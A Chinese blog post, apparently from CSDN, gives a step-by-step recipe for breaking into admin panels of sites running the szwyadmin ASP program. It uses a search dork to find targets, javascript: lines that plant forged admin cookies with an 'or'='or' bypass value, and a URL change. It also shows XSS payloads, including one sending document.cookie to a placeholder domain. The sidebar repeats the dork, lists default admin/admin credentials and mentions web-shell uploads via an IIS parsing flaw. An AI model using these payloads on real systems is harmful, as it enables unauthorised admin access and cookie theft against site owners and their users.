azwyadmin程序cookies欺骗漏洞&&跨站攻击网站

最新推荐文章于 2024-04-06 09:55:08 发布
最新推荐文章于 2024-04-06 09:55:08 发布
阅读量383 收藏 1
点赞数
分类专栏: Hacke
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlh006/article/details/82686105
版权

azwyadmin程序cookies欺骗漏洞:

一、搜索关键字
inurl:szwyadmin/login.asp

二、进入执行代码
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

三、更改文件名
login.asp改为admin_index.asp     

四、访问OK

 

跨站攻击网站:

一、跨站攻击的概念
跨站攻击:即Cross Site Script Execution(通常简写为XSS),攻击者输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。

二、跨站攻击的演示
<script>alert("这个是跨站攻击")</script>
<script>windows.open('http://域名/info.asp=?msg='+document.cookie)</script>
<iframe src=http://star.news.sohu.com/s2016/editorial-50/ width=500 height=500></iframe>

xlh006
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Y-Admin::spouting_whale:基于layui的管理系统模板,代码易读易懂,结构清晰,界面简洁美观。演示版 http
05-10
Y-Admin Y-Admin是基于 layui 实现后台管理模板 为了工作上能够有效的控制开发时间,结合 layui 知识,参考 z-admin 自己搭建的一个关于后台管理系统的模板,能构建一个可以快速使用的简单后台模板,希望能帮助到有需要的人,有时间就会更新新的内容,实现一些常用的功能 快速开始 克隆项目: git clone https://github.com/C-GY/Y-Admin.git 部署本地后访问 演示网址 项目结构说明 |-- Y-Admin |-- README.md //说明 |-- .gitignore //git项目忽视文件 |-- favicon.ico //网页标题栏图标 |-- index.html //入口文件 |--
随缘学校管理系统完整版 V2.0.rar
07-05
前台版面布局大气,适合用于学校,企业,公司建站之用。 后台功能有: 新闻管理,图片管理,报名管理,菜单管理,用户管理,友情连接管理等。 登录后台:/szwyadmin/login.asp 管理员账户:admin 密码:admin
探索Y-Admin:一个高效且灵活的后台管理系统框架
最新发布
gitblog_00092的博客
04-06 462
探索Y-Admin:一个高效且灵活的后台管理系统框架 项目地址:https://gitcode.com/C-GY/Y-Admin 项目简介 =Y-Admin是一个基于Vue.js和Element UI构建的高效、简洁的后台管理框架。它为开发者提供了一套完整的前端解决方案,以加速企业级后台应用的开发进程。项目源码托管在GitCode,欢迎广大开发者参与贡献和使用。 技术分析 基础架构 Vue.j...
访问网站数据库的一个方法
luyang1821的博客
03-08 1万+
第一步:随便打开一个浏览器,1. 百度或google搜索存在漏洞网站:   inurl:szwyadmin/login.asp2. 会出现一些login.asp后缀的网站后台,随便进去一个,例如: 3. 随便点击进去一个,有的进去了不能够提权,要耐心找,反复找接下来点进去后会出现这样的画面: 这个站我已经试过了,可以成功进入后台的,然后利用工具包(最简单的拿站方法,里面有教你提权和放大马)的一段...
新手入侵笔记
weixin_33736832的博客
03-21 6442
【 拿shell 】  1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls  2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。  3.上传图片木马把地址复制到...
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
10-29
Cookies欺骗漏洞通常利用网站在用户管理中依赖于浏览器存储的Cookies来维持登录状态的弱点。攻击者通过构造特定的HTTP请求,伪造Cookies中的`username`和`userlevel`字段,从而冒充其他用户,尤其是管理员,获取不...
XSS跨站攻击课程.pdf
01-25
- **定义**:XSS(Cross-Site Scripting)即跨站脚本攻击,是指攻击者利用网站漏洞,将恶意脚本代码注入到网页中,当其他用户浏览这些网页时,就会在用户的浏览器上执行恶意代码。XSS攻击通常发生在用户与Web应用...
XSS跨站脚本攻击漏洞修复方法
06-18
**XSS跨站脚本攻击漏洞修复方法** XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网站进行破坏。本文将...
关于网站后台攻防技术的深入研究(刚进来就看到的文章)
jindg1980的博客
04-26 678
今天给大家带来一个简单的网站后台入侵的方法,大家可以去试试,若成功入侵了,也请各位不要搞破坏,本教程纯属提供一种方式给大家互相学习交流。 步骤如下: 1.打开浏览器:这里我使用的是360浏览器。 2.百度搜索inurl:szwyadmin/login.asp  出来下面的界面: 3.出来的就是一些网站的后台登录的网址。这里我随意选一个点击进入: 这里我选的是第二个
js
jktaihe的专栏
03-05 513
首先,把下面的代码输入网址 代码:javascript:alert(document.cookie="adminuser="+escape("'or'='or'")); javascript:alert(document.cookie="adminpass="+escape("'or'='or'")); javascript:alert(document.cookie="admi
JavaScript中的document.cookie的使用
weixin_34216196的博客
11-16 268
我们已经知道,在document对象中有一个cookie属性。但是Cookie又是什么?“某些Web站点在您的硬盘上用很小的文本文件存储了一些信息,这些文件就称为Cookie。”——MSIE帮助。一般来说,Cookies是CGI或类似,比HTML高级的文件、程序等创建的,但是javascript也提供了对Cookies的很全面的访问权利。  我们先要学一学Cookie的基本知...
关于document.cookie的使用
rush2012的专栏
06-25 435
[align=center][b]关于document.cookie的使用[/b][/align] [b]设置cookie[/b] 每个cookie都是一个名/值对,可以把下面这样一个字符串赋值给document.cookiedocument.cookie="userId=828"; 如果要一次存储多个名/值对,可以使用分号加空格(; )隔开,例如: document.cooki...
cookie欺骗
weixin_34197488的博客
01-06 217
1.什么是cookie欺骗改变cookie的值,发给服务器,就是cookie欺骗。正常情况下,受浏览器的内部cookie机制所限,每个cookie只能被它的原服务器所访问,我们操作不了原服务器。 2.cookie使用示例 index.html 写入cookie {'username':'zhangsan','psw':'123'} &lt;!DOCTYPE html&gt; &lt;h...
一个程序员浅谈“如何Web安全”
热门推荐
localhost01
10-07 2万+
文章已转移:https://blog.csdn.net/localhost01/article/details/86560345
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值